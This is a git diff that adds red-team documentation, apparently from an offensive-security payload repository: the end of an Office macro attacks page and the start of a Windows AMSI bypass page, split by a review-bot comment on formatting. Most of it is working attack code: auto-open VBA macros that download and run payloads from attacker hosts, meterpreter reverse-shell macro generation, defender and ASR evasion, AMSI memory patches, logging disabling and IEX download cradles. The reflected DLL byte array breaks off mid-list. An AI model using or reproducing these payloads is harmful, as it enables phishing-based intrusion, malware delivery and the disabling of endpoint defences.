net.webclient).downloadstring('http://192.168.1.59:80/fezsdfqs'))" + Call service.GetFolder("\").RegisterTaskDefinition("AVUpdateTask", td, 6, , , 3) +End Sub +Rem powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.59:80/fezsdfqs'))" +``` + +### DOCM - WMI COM functions + +Basic WMI exec (detected by Defender) : `r = GetObject("winmgmts:\\.\root\cimv2:Win32_Process").Create("calc.exe", null, null, intProcessID)` + +```ps1 +Sub wmi_exec() + strComputer = "." + Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2") + Set objStartUp = objWMIService.Get("Win32_ProcessStartup") + Set objProc = objWMIService.Get("Win32_Process") + Set procStartConfig = objStartUp.SpawnInstance_ + procStartConfig.ShowWindow = 1 + objProc.Create "powershell.exe", Null, procStartConfig, intProcessID +End Sub +``` + +* https://gist.github.com/infosecn1nja/24a733c5b3f0e5a8b6f0ca2cf75967e3 +* https://labs.inquest.net/dfi/sha256/f4266788d4d1bec6aac502ddab4f7088a9840c84007efd90c5be7ecaec0ed0c2 + +```ps1 +Sub ASR_bypass_create_child_process_rule5() + Const HIDDEN_WINDOW = 0 + strComputer = "." 
+ Set objWMIService = GetObject("win" & "mgmts" & ":\\" & strComputer & "\root" & "\cimv2") + Set objStartup = objWMIService.Get("Win32_" & "Process" & "Startup") + Set objConfig = objStartup.SpawnInstance_ + objConfig.ShowWindow = HIDDEN_WINDOW + Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root" & "\cimv2" & ":Win32_" & "Process") + objProcess.Create "cmd.exe /c powershell.exe IEX ( IWR -uri 'http://10.10.10.10/stage.ps1')", Null, objConfig, intProcessID +End Sub + +Sub AutoExec() + ASR_bypass_create_child_process_rule5 +End Sub + +Sub AutoOpen() + ASR_bypass_create_child_process_rule5 +End Sub +``` + +```ps1 +Const ShellWindows = "{9BA05972-F6A8-11CF-A442-00A0C90A8F39}" +Set SW = GetObject("new:" & ShellWindows).Item() +SW.Document.Application.ShellExecute "cmd.exe", "/c powershell.exe", "C:\Windows\System32", Null, 0 +``` + +### DOCM/XLM - Macro Pack - Macro and DDE + +> Only the community version is available online. + +* [https://github.com/sevagas/macro_pack](https://github.com/sevagas/macro_pack/releases/download/v2.0.1/macro_pack.exe) + +```powershell +# Options +-G, --generate=OUTPUT_FILE_PATH. Generates a file. +-t, --template=TEMPLATE_NAME Use code template already included in MacroPack +-o, --obfuscate Obfuscate code (remove spaces, obfuscate strings, obfuscate functions and variables name) + +# Execute a command +echo "calc.exe" | macro_pack.exe -t CMD -G cmd.xsl + +# Download and execute a file +echo "" | macro_pack.exe -t DROPPER -o -G dropper.xls + +# Meterpreter reverse TCP template using MacroMeter by Cn33liz +echo | macro_pack.exe -t METERPRETER -o -G meter.docm + +# Drop and execute embedded file +macro_pack.exe -t EMBED_EXE --embed=c:\windows\system32\calc.exe -o -G my_calc.vbs + +# Obfuscate the vba file generated by msfvenom and put result in a new vba file. 
+msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.5 -f vba | macro_pack.exe -o -G meterobf.vba + +# Obfuscate Empire stager vba file and generate a MS Word document: +macro_pack.exe -f empire.vba -o -G myDoc.docm + +# Generate an MS Excel file containing an obfuscated dropper (download payload.exe and store as dropped.exe) +echo "https://myurl.url/payload.exe" "dropped.exe" | macro_pack.exe -o -t DROPPER -G "drop.xlsm" + +# Execute calc.exe via Dynamic Data Exchange (DDE) attack +echo calc.exe | macro_pack.exe --dde -G calc.xslx + +# Download and execute file via powershell using Dynamic Data Exchange (DDE) attack +macro_pack.exe --dde -f ..\resources\community\ps_dl_exec.cmd -G DDE.xsl + +# PRO: Generate a Word file containing VBA self encoded x64 reverse meterpreter VBA payload (will bypass most AV). +msfvenom.bat -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.5 -f vba | macro_pack.exe -o --autopack --keep-alive -G out.docm + +# PRO: Trojan a PowerPoint file with a reverse meterpreter. Macro is obfuscated and mangled to bypass AMSI and most antiviruses. 
+msfvenom.bat -p windows/meterpreter/reverse_tcp LHOST=192.168.0.5 -f vba | macro_pack.exe -o --autopack --trojan -G hotpics.pptm + +# PRO: Generate an HTA payload able to run a shellcode via Excel injection +echo meterx86.bin meterx64.bin | macro_pack.exe -t AUTOSHELLCODE --run-in-excel -o -G samples\nicepic.hta +echo meterx86.bin meterx64.bin | macro_pack.exe -t AUTOSHELLCODE -o --hta-macro --run-in-excel -G samples\my_shortcut.lnk + +# PRO: XLM Injection +echo "MPPro" | macro_pack.exe -G _samples\hello.doc -t HELLO --xlm --run-in-excel + +# PRO: ShellCode Exec - Heap Injection, AlternativeInjection +echo "x32calc.bin" | macro_pack.exe -t SHELLCODE -o --shellcodemethod=HeapInjection -G test.doc +echo "x32calc.bin" | macro_pack.exe -t SHELLCODE -o --shellcodemethod=AlternativeInjection --background -G test.doc + +# PRO: More shellcodes +echo x86.bin | macro_pack.exe -t SHELLCODE -o -G test.pptm –keep-alive +echo "x86.bin" "x64.bin" | macro_pack.exe -t AUTOSHELLCODE -o –autopack -G sc_auto.doc +echo "http://192.168.5.10:8080/x32calc.bin" "http://192.168.5.10:8080/x64calc.bin" | macro_pack.exe -t DROPPER_SHELLCODE -o --shellcodemethod=ClassicIndirect -G samples\sc_dl.xls +``` + +### DOCM - BadAssMacros + +> C# based automated Malicous Macro Generator. 
+ +* https://github.com/Inf0secRabbit/BadAssMacros + +```powershell +BadAssMacros.exe -h + +# Create VBA for classic shellcode injection from raw shellcode +BadAssMacros.exe -i -w -p no -s classic -c -o +BadAssMacros.exe -i .\Desktop\payload.bin -w doc -p no -s classic -c 23 -o .\Desktop\output.txt + +# Create VBA for indirect shellcode injection from raw shellcode +BadAssMacros.exe -i -w -p no -s indirect -o + +# List modules inside Doc/Excel file +BadAssMacros.exe -i -w -p yes -l + +# Purge Doc/Excel file +BadAssMacros.exe -i -w -p yes -o -m +``` + + +### DOCM - CACTUSTORCH VBA Module + +> CactusTorch is leveraging the DotNetToJscript technique to load a .Net compiled binary into memory and execute it from vbscript + +* https://github.com/mdsecactivebreach/CACTUSTORCH +* https://github.com/tyranid/DotNetToJScript/ +* CACTUSTORCH - DotNetToJScript all the things - https://youtu.be/YiaKb8nHFSY +* CACTUSTORCH - CobaltStrike Aggressor Script Addon - https://www.youtube.com/watch?v=_pwH6a-6yAQ + +1. Import **.cna** in Cobalt Strike +2. Generate a new VBA payload from the CACTUSTORCH menu +3. Download DotNetToJscript +4. Compile it + * **DotNetToJscript.exe** - responsible for bootstrapping C# binaries (supplied as input) and converting them to JavaScript or VBScript + * **ExampleAssembly.dll** - the C# assembly that will be given to DotNetToJscript.exe. In default project configuration, the assembly just pops a message box with the text "test" +5. Execute **DotNetToJscript.exe** and supply it with the ExampleAssembly.dll, specify the output file and the output type + ```ps1 + DotNetToJScript.exeExampleAssembly.dll -l vba -o test.vba -c cactusTorch + ``` +6. Use the generated code to replace the hardcoded binary in CactusTorch + + +### DOCM - MMG with Custom DL + Exec + +1. Custom Download in first Macro to "C:\\Users\\Public\\beacon.exe" +2. Create a custom binary execute using MMG +3. 
Merge both Macro + +```ps1 +git clone https://github.com/Mr-Un1k0d3r/MaliciousMacroGenerator +python MMG.py configs/generic-cmd.json malicious.vba +{ + "description": "Generic command exec payload\nEvasion technique set to none", + "template": "templates/payloads/generic-cmd-template.vba", + "varcount": 152, + "encodingoffset": 5, + "chunksize": 180, + "encodedvars": {}, + "vars": [], + "evasion": ["encoder"], + "payload": "cmd.exe /c C:\\Users\\Public\\beacon.exe" +} +``` + +```vb +Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long + +Public Function DownloadFileA(ByVal URL As String, ByVal DownloadPath As String) As Boolean + On Error GoTo Failed + DownloadFileA = False + 'As directory must exist, this is a check + If CreateObject("Scripting.FileSystemObject").FolderExists(CreateObject("Scripting.FileSystemObject").GetParentFolderName(DownloadPath)) = False Then Exit Function + Dim returnValue As Long + returnValue = URLDownloadToFile(0, URL, DownloadPath, 0, 0) + 'If return value is 0 and the file exist, then it is considered as downloaded correctly + DownloadFileA = (returnValue = 0) And (Len(Dir(DownloadPath)) > 0) + Exit Function + +Failed: +End Function + +Sub AutoOpen() + DownloadFileA "http://10.10.10.10/macro.exe", "C:\\Users\\Public\\beacon.exe" +End Sub + + +Sub Auto_Open() + DownloadFileA "http://10.10.10.10/macro.exe", "C:\\Users\\Public\\beacon.exe" +End Sub +``` + +### DOCM - ActiveX-based (InkPicture control, Painted event) Autorun macro + +Go to **Developer tab** on ribbon `-> Insert -> More Controls -> Microsoft InkPicture Control` + +```vb +Private Sub InkPicture1_Painted(ByVal hDC As Long, ByVal Rect As MSINKAUTLib.IInkRectangle) +Run = Shell("cmd.exe /c PowerShell (New-Object System.Net.WebClient).DownloadFile('https:///file.exe','file.exe');Start-Process 'file.exe'", 
vbNormalFocus) +End Sub +``` + + + +### VBA Obfuscation + +```ps1 +# https://www.youtube.com/watch?v=L0DlPOLx2k0 +$ git clone https://github.com/bonnetn/vba-obfuscator +$ cat example_macro/download_payload.vba | docker run -i --rm bonnetn/vba-obfuscator /dev/stdin +``` + +### VBA Purging + +**VBA Stomping**: This technique allows attackers to remove compressed VBA code from Office documents and still execute malicious macros without many of the VBA keywords that AV engines had come to rely on for detection. == Removes P-code. + +:warning: VBA stomping is not effective against Excel 97-2003 Workbook (.xls) format. + +#### OfficePurge +* https://github.com/fireeye/OfficePurge/releases/download/v1.0/OfficePurge.exe + +```powershell +OfficePurge.exe -d word -f .\malicious.doc -m NewMacros +OfficePurge.exe -d excel -f .\payroll.xls -m Module1 +OfficePurge.exe -d publisher -f .\donuts.pub -m ThisDocument +OfficePurge.exe -d word -f .\malicious.doc -l +``` + + +#### EvilClippy + +> Evil Clippy uses the OpenMCDF library to manipulate CFBF files. +> Evil Clippy compiles perfectly fine with the Mono C# compiler and has been tested on Linux, OSX and Windows. +> If you want to manipulate CFBF files manually, then FlexHEX is one of the best editors for this. + +```ps1 +# OSX/Linux +mcs /reference:OpenMcdf.dll,System.IO.Compression.FileSystem.dll /out:EvilClippy.exe *.cs +# Windows +csc /reference:OpenMcdf.dll,System.IO.Compression.FileSystem.dll /out:EvilClippy.exe *.cs + +EvilClippy.exe -s fake.vbs -g -r cobaltstrike.doc +EvilClippy.exe -s fakecode.vba -t 2016x86 macrofile.doc +EvilClippy.exe -s fakecode.vba -t 2013x64 macrofile.doc + +# make macro code unaccessible is to mark the project as locked and unviewable: -u +# Evil Clippy can confuse pcodedmp and many other analysis tools with the -r flag. 
+EvilClippy.exe -r macrofile.doc +``` + + +### VBA - Offensive Security Template + +* Reverse Shell VBA - https://github.com/JohnWoodman/VBA-Macro-Reverse-Shell/blob/main/VBA-Reverse-Shell.vba +* Process Dumper - https://github.com/JohnWoodman/VBA-Macro-Dump-Process +* RunPE - https://github.com/itm4n/VBA-RunPE +* Spoof Parent - https://github.com/py7hagoras/OfficeMacro64 +* AMSI Bypass - https://github.com/outflanknl/Scripts/blob/master/AMSIbypasses.vba +* amsiByPassWithRTLMoveMemory - https://gist.github.com/DanShaqFu/1c57c02660b2980d4816d14379c2c4f3 +* VBA macro spawning a process with a spoofed parent - https://github.com/christophetd/spoofing-office-macro/blob/master/macro64.vba + +### VBA - AMSI + +> The Office VBA integration with AMSI is made up of three parts: (a) logging macro behavior, (b) triggering a scan on suspicious behavior, and (c) stopping a malicious macro upon detection. https://www.microsoft.com/security/blog/2018/09/12/office-vba-amsi-parting-the-veil-on-malicious-macros/ + + +![](https://www.microsoft.com/security/blog/wp-content/uploads/2018/09/fig2-runtime-scanning-amsi-8-1024x482.png) + +:warning: It appears that p-code based attacks where the VBA code is stomped will still be picked up by the AMSI engine (e.g. files manipulated by our tool EvilClippy). 
+ +The AMSI engine only hooks into VBA, we can bypass it by using Excel 4.0 Macro + +* AMSI Trigger - https://github.com/synacktiv/AMSI-Bypass + +```vb +Private Declare PtrSafe Function GetProcAddress Lib "kernel32" (ByVal hModule As LongPtr, ByVal lpProcName As String) As LongPtr +Private Declare PtrSafe Function LoadLibrary Lib "kernel32" Alias "LoadLibraryA" (ByVal lpLibFileName As String) As LongPtr +Private Declare PtrSafe Function VirtualProtect Lib "kernel32" (lpAddress As Any, ByVal dwSize As LongPtr, ByVal flNewProtect As Long, lpflOldProtect As Long) As Long +Private Declare PtrSafe Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As LongPtr) + +Private Sub Document_Open() + Dim AmsiDLL As LongPtr + Dim AmsiScanBufferAddr As LongPtr + Dim result As Long + Dim MyByteArray(6) As Byte + Dim ArrayPointer As LongPtr + + MyByteArray(0) = 184 ' 0xB8 + MyByteArray(1) = 87 ' 0x57 + MyByteArray(2) = 0 ' 0x00 + MyByteArray(3) = 7 ' 0x07 + MyByteArray(4) = 128 ' 0x80 + MyByteArray(5) = 195 ' 0xC3 + + AmsiDLL = LoadLibrary("amsi.dll") + AmsiScanBufferAddr = GetProcAddress(AmsiDLL, "AmsiScanBuffer") + result = VirtualProtect(ByVal AmsiScanBufferAddr, 5, 64, 0) + ArrayPointer = VarPtr(MyByteArray(0)) + CopyMemory ByVal AmsiScanBufferAddr, ByVal ArrayPointer, 6 + +End Sub +``` + +### DOCX - Template Injection + +:warning: Does not require "Enable Macro" + +#### Remote Template + +1. A malicious macro is saved in a Word template .dotm file +2. Benign .docx file is created based on one of the default MS Word Document templates +3. Document from step 2 is saved as .docx +4. Document from step 3 is renamed to .zip +5. Document from step 4 gets unzipped +6. **.\word_rels\settings.xml.rels** contains a reference to the template file. That reference gets replaced with a reference to our malicious macro created in step 1. File can be hosted on a web server (http) or webdav (smb). + ```xml + + + ``` + ```xml + + ``` +7. 
File gets zipped back up again and renamed to .docx + +#### Template Injections Tools + +* https://github.com/JohnWoodman/remoteInjector +* https://github.com/ryhanson/phishery + +```ps1 +$ phishery -u https://secure.site.local/docs -i good.docx -o bad.docx +[+] Opening Word document: good.docx +[+] Setting Word document template to: https://secure.site.local/docs +[+] Saving injected Word document to: bad.docx +[*] Injected Word document has been saved! +``` + + +### DOCX - DDE + +* Insert > QuickPart > Field +* Right Click > Toggle Field Code +* `{ DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe" }` + + +## References + +* [VBA RunPE Part 1 - itm4n](https://itm4n.github.io/vba-runpe-part1/) +* [VBA RunPE Part 2 - itm4n](https://itm4n.github.io/vba-runpe-part2/) +* [Office VBA AMSI Parting the veil on malicious macros - Microsoft](https://www.microsoft.com/security/blog/2018/09/12/office-vba-amsi-parting-the-veil-on-malicious-macros/) +* [Bypassing AMSI fro VBA - Outflank](https://outflank.nl/blog/2019/04/17/bypassing-amsi-for-vba/) +* [Evil Clippy MS Office Maldoc Assistant - Outflank](https://outflank.nl/blog/2019/05/05/evil-clippy-ms-office-maldoc-assistant/) +* [Old schoold evil execl 4.0 macros XLM - Outflank](https://outflank.nl/blog/2018/10/06/old-school-evil-excel-4-0-macros-xlm/) +* [Excel 4 Macro Generator x86/x64 - bytecod3r](https://bytecod3r.io/excel-4-macro-generator-x86-x64/) +* [VBad - Pepitoh](https://github.com/Pepitoh/VBad) +* [Excel 4.0 Macro Function Reference PDF](https://d13ot9o61jdzpp.cloudfront.net/files/Excel%204.0%20Macro%20Functions%20Reference.pdf) +* [Excel 4.0 Macros so hot right now - SneekyMonkey](https://www.sneakymonkey.net/2020/06/22/excel-4-0-macros-so-hot-right-now/) +* [Macros and more with sharpshooter v2.0 - mdsec](https://www.mdsec.co.uk/2019/02/macros-and-more-with-sharpshooter-v2-0/) +* [Further evasion in the forgotten corners of ms xls - 
malware.pizza](https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/) +* [Excel 4.0 macro old but new - fsx30](https://medium.com/@fsx30/excel-4-0-macro-old-but-new-967071106be9) +* [XLS 4.0 macros and covenant - d-sec](https://d-sec.net/2020/10/24/xls-4-0-macros-and-covenant/) +* [Inject macro from a remote dotm template - ired.team](https://www.ired.team/offensive-security/initial-access/phishing-with-ms-office/inject-macros-from-a-remote-dotm-template-docx-with-macros) +* [Phishinh with OLE - ired.team](https://www.ired.team/offensive-security/initial-access/phishing-with-ms-office/phishing-ole-+-lnk) +* [Phishing SLK - ired.team](https://www.ired.team/offensive-security/initial-access/phishing-with-ms-office/phishing-.slk-excel)bypassing-malicious-macro-detections-by-defeating-child-parent-process-relationships) +* [PropertyBomb an old new technique for arbitrary code execution in vba macro - Leon Berlin - 22 May 2018](https://www.bitdam.com/2018/05/22/propertybomb-an-old-new-technique-for-arbitrary-code-execution-in-vba-macro/) +* [AMSI in the heap - rmdavy](https://secureyourit.co.uk/wp/2020/04/17/amsi-in-the-heap/) +* [WordAMSIBypass - rmdavy](https://github.com/rmdavy/WordAmsiBypass) +* [Dechaining macros and evading EDR - Noora Hyvärinen](https://blog.f-secure.com/dechaining-macros-and-evading-edr/) +* [Executing macros from docx with remote - RedXORBlueJuly 18, 2018](http://blog.redxorblue.com/2018/07/executing-macros-from-docx-with-remote.html) +* [One thousand and one ways to copy your shellcode to memory (VBA Macros) - X-C3LL - Feb 18, 2021](https://adepts.of0x.cc/alternatives-copy-shellcode/) +* [Running macros via ActiveX controls - greyhathacker - September 29, 2016](http://www.greyhathacker.net/?p=948) +* [Anti-Analysis Techniques Used in Excel 4.0 Macros - 24 March 2021 - @Jacob_Pimental](https://www.goggleheadedhacker.com/blog/post/23) +* [So you think you can block Macros? 
- Pieter Ceelen - April 25, 2023](https://outflank.nl/blog/2023/04/25/so-you-think-you-can-block-macros/) \ No newline at end of file diff --git a/docs/redteam/Windows - AMSI Bypass.md b/docs/redteam/Windows - AMSI Bypass.md new file mode 100644 index 0000000..14c6cdf --- /dev/null +++ b/docs/redteam/Windows - AMSI Bypass.md 
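Review bot: in the `docs/redteam/Office - Attacks.md` hunk the fence language tags do not match the content, which breaks syntax highlighting and misleads readers about what runs where: the "DOCM - Download and Execute", "DOCM - VBA Wscript", "DOCM - VBA Spawning via svchost.exe" and "DOCM - WMI COM functions" blocks are VBA but are fenced as ```ps1, while neighbouring VBA blocks use ```vb; the "SLK - EXEC" block is an SLK file and the "XLM Excel 4.0 - EXEC" cells are Excel formulas, yet both are tagged as PowerShell. Suggest ```vb for every VBA listing and a plain fence (or ```text) for the SLK and XLM cells, keeping ```ps1 only for the PowerShell/command-line blocks. Same hunk, the "Remote Template" step 6 ends with two empty ```xml fences, so the settings.xml.rels content the step refers to is missing and the step cannot be followed as written. Also in this hunk: `DotNetToJScript.exeExampleAssembly.dll` is missing the space between the binary and its argument; the "Phishing SLK - ired.team" reference has a second URL fragment (`bypassing-malicious-macro-detections-by-...`) glued after the closing parenthesis, which looks like a lost list item and should be its own entry or removed; and the reference titles carry typos ("Phishinh with OLE", "Old schoold evil execl 4.0", "Bypassing AMSI fro VBA", "Malicous Macro Generator"). The file is also committed without a trailing newline (`\ No newline at end of file`).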
@@ -0,0 +1,778 @@ +# Windows - AMSI Bypass + +## Summary + +* [List AMSI Providers](#list-amsi-providers) +* [Which Endpoint Protection is Using AMSI](#which-endpoint-protection-is-using-amsi) +* [Patching amsi.dll AmsiScanBuffer by rasta-mouse](#Patching-amsi.dll-AmsiScanBuffer-by-rasta-mouse) +* [Dont use net webclient](#Dont-use-net-webclient) +* [Amsi ScanBuffer Patch from -> https://www.contextis.com/de/blog/amsi-bypass](#Amsi-ScanBuffer-Patch) +* [Forcing an error](#Forcing-an-error) +* [Disable Script Logging](#Disable-Script-Logging) +* [Amsi Buffer Patch - In memory](#Amsi-Buffer-Patch---In-memory) +* [Same as 6 but integer Bytes instead of Base64](#Same-as-6-but-integer-Bytes-instead-of-Base64) +* [Using Matt Graeber's Reflection method](#Using-Matt-Graebers-Reflection-method) +* [Using Matt Graeber's Reflection method with WMF5 autologging bypass](#Using-Matt-Graebers-Reflection-method-with-WMF5-autologging-bypass) +* [Using Matt Graeber's second Reflection method](#Using-Matt-Graebers-second-Reflection-method) +* [Using Cornelis de Plaa's DLL hijack method](#Using-Cornelis-de-Plaas-DLL-hijack-method") +* [Use Powershell Version 2 - No AMSI Support there](#Using-PowerShell-version-2) +* [Nishang all in one](#Nishang-all-in-one) +* [Adam Chesters Patch](#Adam-Chester-Patch) +* [AMSI.fail](#amsifail) + +## List AMSI Providers + +* List providers with : `Get-ChildItem -Path 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers\'` +* Find software from CLSID + ```ps1 + Get-ChildItem -Path 'HKLM:\SOFTWARE\Classes\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}' + Name Property + ---- -------- + Hosts (default) : Scanned Hosting Applications + InprocServer32 (default) : "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2210.4-0\MpOav.dll" + ``` + +## Which Endpoint Protection is Using AMSI + +Small extract from [subat0mik/whoamsi](https://github.com/subat0mik/whoamsi) - An effort to track security vendors' use of Microsoft's Antimalware Scan Interface: + +| 
Vendor/Product | AMSI | Date | Reference | +| -------- | -------- | -------- | -------- | +| Avast | Y | 03/20/2016 | https://forum.avast.com/index.php?topic=184491.msg1300884#msg1300884 | +| AVG | Y | 03/08/2016 | https://support.avg.com/answers?id=906b00000008oUTAAY | +| BitDefender Consumer | Y | 09/20/2016 | https://forum.bitdefender.com/index.php?/topic/72455-antimalware-scan-service/ | +| BitDefender Enterprise | Y | 05/25/2021 | https://twitter.com/Bitdefender_Ent/status/1397187195669295111?s=20 | +| Kaspersky Anti Targeted Attack Platform | Y | 10/10/2018 | https://help.kaspersky.com/KIS/2019/en-US/119653.htm | +| Symantec Advanced Threat Protection | Y | 07/15/2020 | https://techdocs.broadcom.com/content/broadcom/techdocs/us/en/symantec-security-software/endpoint-security-and-management/endpoint-protection/all/release-notes/Whats-new-for-Symantec-Endpoint-Protection-14_3-.html | +| Microsoft Defender for Endpoint | Y | 06/09/2015 | https://www.microsoft.com/security/blog/2015/06/09/windows-10-to-offer-application-developers-new-malware-defenses/ + + +# Patching amsi.dll AmsiScanBuffer by rasta-mouse + +```ps1 +$Win32 = @" + +using System; +using System.Runtime.InteropServices; + +public class Win32 { + + [DllImport("kernel32")] + public static extern IntPtr GetProcAddress(IntPtr hModule, string procName); + + [DllImport("kernel32")] + public static extern IntPtr LoadLibrary(string name); + + [DllImport("kernel32")] + public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); + +} +"@ + +Add-Type $Win32 + +$LoadLibrary = [Win32]::LoadLibrary("am" + "si.dll") +$Address = [Win32]::GetProcAddress($LoadLibrary, "Amsi" + "Scan" + "Buffer") +$p = 0 +[Win32]::VirtualProtect($Address, [uint32]5, 0x40, [ref]$p) +$Patch = [Byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3) +[System.Runtime.InteropServices.Marshal]::Copy($Patch, 0, $Address, 6) +``` + +## Dont use net webclient + +> Not Working anymore, there was 
a patch for it + +```ps1 +$webreq = [System.Net.WebRequest]::Create(‘https://maliciousscripturl/malicious.ps1’) +$resp=$webreq.GetResponse() +$respstream=$resp.GetResponseStream() +$reader=[System.IO.StreamReader]::new($respstream) +$content=$reader.ReadToEnd() +IEX($content) +``` + +## The Short version of dont use powershell net webclient + +> Not Working anymore, there was a patch for it + +```ps1 +IEX([Net.Webclient]::new().DownloadString("https://maliciousscripturl/malicious.ps1")) +``` + +# Amsi ScanBuffer Patch + +Egghunter with blog post: https://www.contextis.com/us/blog/amsi-bypass + +```ps1 +Write-Host "-- AMSI Patch" +Write-Host "-- Paul Laîné (@am0nsec)" +Write-Host "" + +$Kernel32 = @" +using System; +using System.Runtime.InteropServices; + +public class Kernel32 { + [DllImport("kernel32")] + public static extern IntPtr GetProcAddress(IntPtr hModule, string lpProcName); + + [DllImport("kernel32")] + public static extern IntPtr LoadLibrary(string lpLibFileName); + + [DllImport("kernel32")] + public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); +} +"@ + +Add-Type $Kernel32 + +Class Hunter { + static [IntPtr] FindAddress([IntPtr]$address, [byte[]]$egg) { + while ($true) { + [int]$count = 0 + + while ($true) { + [IntPtr]$address = [IntPtr]::Add($address, 1) + If ([System.Runtime.InteropServices.Marshal]::ReadByte($address) -eq $egg.Get($count)) { + $count++ + If ($count -eq $egg.Length) { + return [IntPtr]::Subtract($address, $egg.Length - 1) + } + } Else { break } + } + } + + return $address + } +} + +[IntPtr]$hModule = [Kernel32]::LoadLibrary("amsi.dll") +Write-Host "[+] AMSI DLL Handle: $hModule" + +[IntPtr]$dllCanUnloadNowAddress = [Kernel32]::GetProcAddress($hModule, "DllCanUnloadNow") +Write-Host "[+] DllCanUnloadNow address: $dllCanUnloadNowAddress" + +If ([IntPtr]::Size -eq 8) { + Write-Host "[+] 64-bits process" + [byte[]]$egg = [byte[]] ( + 0x4C, 0x8B, 0xDC, # mov r11,rsp + 0x49, 
0x89, 0x5B, 0x08, # mov qword ptr [r11+8],rbx + 0x49, 0x89, 0x6B, 0x10, # mov qword ptr [r11+10h],rbp + 0x49, 0x89, 0x73, 0x18, # mov qword ptr [r11+18h],rsi + 0x57, # push rdi + 0x41, 0x56, # push r14 + 0x41, 0x57, # push r15 + 0x48, 0x83, 0xEC, 0x70 # sub rsp,70h + ) +} Else { + Write-Host "[+] 32-bits process" + [byte[]]$egg = [byte[]] ( + 0x8B, 0xFF, # mov edi,edi + 0x55, # push ebp + 0x8B, 0xEC, # mov ebp,esp + 0x83, 0xEC, 0x18, # sub esp,18h + 0x53, # push ebx + 0x56 # push esi + ) +} +[IntPtr]$targetedAddress = [Hunter]::FindAddress($dllCanUnloadNowAddress, $egg) +Write-Host "[+] Targeted address: $targetedAddress" + +$oldProtectionBuffer = 0 +[Kernel32]::VirtualProtect($targetedAddress, [uint32]2, 4, [ref]$oldProtectionBuffer) | Out-Null + +$patch = [byte[]] ( + 0x31, 0xC0, # xor rax, rax + 0xC3 # ret +) +[System.Runtime.InteropServices.Marshal]::Copy($patch, 0, $targetedAddress, 3) + +$a = 0 +[Kernel32]::VirtualProtect($targetedAddress, [uint32]2, $oldProtectionBuffer, [ref]$a) | Out-Null +``` + +# Forcing an error + +```ps1 +$mem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(9076) + +[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiSession","NonPublic,Static").SetValue($null, $null);[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiContext","NonPublic,Static").SetValue($null, [IntPtr]$mem) +``` + +# Disable Script Logging + +```ps1 +$settings = [Ref].Assembly.GetType("System.Management.Automation.Utils").GetField("cachedGroupPolicySettings","NonPublic,Static").GetValue($null); +$settings["HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging"] = @{} +$settings["HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging"].Add("EnableScriptBlockLogging", "0") +``` + +```ps1 +[Ref].Assembly.GetType("System.Management.Automation.ScriptBlock").GetField("signatures","NonPublic,static").SetValue($null, (New-Object 
'System.Collections.Generic.HashSet[string]')) +``` + +# Amsi Buffer Patch - In memory + +```ps1 +function Bypass-AMSI +{ + if(-not ([System.Management.Automation.PSTypeName]"Bypass.AMSI").Type) { [Reflection.Assembly]::Load([Convert]::FromBase64String("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")) | Out-Null + Write-Output "DLL has been reflected"; + } + [Bypass.AMSI]::Patch() +} +``` + +# Same as 6 but integer Bytes instead of Base64 + +```ps1 +function MyPatch{ + if(-not ([System.Management.Automation.PSTypeName]"Bypass.AMSI").Type) { + [Reflection.Assembly]::Load([byte[]]@(77, 90, 144, 0, 3, 0, 0, 0, 4, 0, 0, 0, 255, 255, 0, 0, 184, 0, 0, 0, 0, 0, 0, 0, 64, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 128, 0, 0, 0, 14, 31, 186, 14, 0, 180, 9, 205, 33, 184, 1, 76, 205, 33, 84, 104, 105, 115, 32, 112, 114, 111, 103, 114, 97, 109, 32, 99, 97, 110, 110, 111, 116, 32, 98, 101, 32, 114, 117, 110, 32, 105, 110, 32, 68, 79, 83, 32, 109, 111, 100, 101, 46, 13, 13, 10, 36, 0, 0, 0, 0, 0, 0, 0, 80, 69, 0, 0, 76, 1, 3, 0, 27, 37, 18, 183, 0, 0, 0, 0, 0, 0, 0, 0, 224, 0, 34, 32, 11, 1, 48, 0, 0, 14, 0, 0, 0, 6, 0, 0, 0, 0, 0, 0, 94, 44, 0, 0, 0, 32, 0, 0, 0, 64, 0, 0, 0, 0, 0, 16, 0, 32, 0, 0, 0, 2, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 128, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 3, 0, 64, 133, 0, 0, 16, 0, 0, 16, 0, 0, 0, 0, 16, 0, 0, 16, 0, 0, 0, 0, 0, 0, 16, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 11, 44, 0, 0, 79, 0, 0, 0, 0, 64, 0, 0, 48, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 96, 0, 0, 12, 0, 0, 0, 44, 43, 0, 0, 84, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 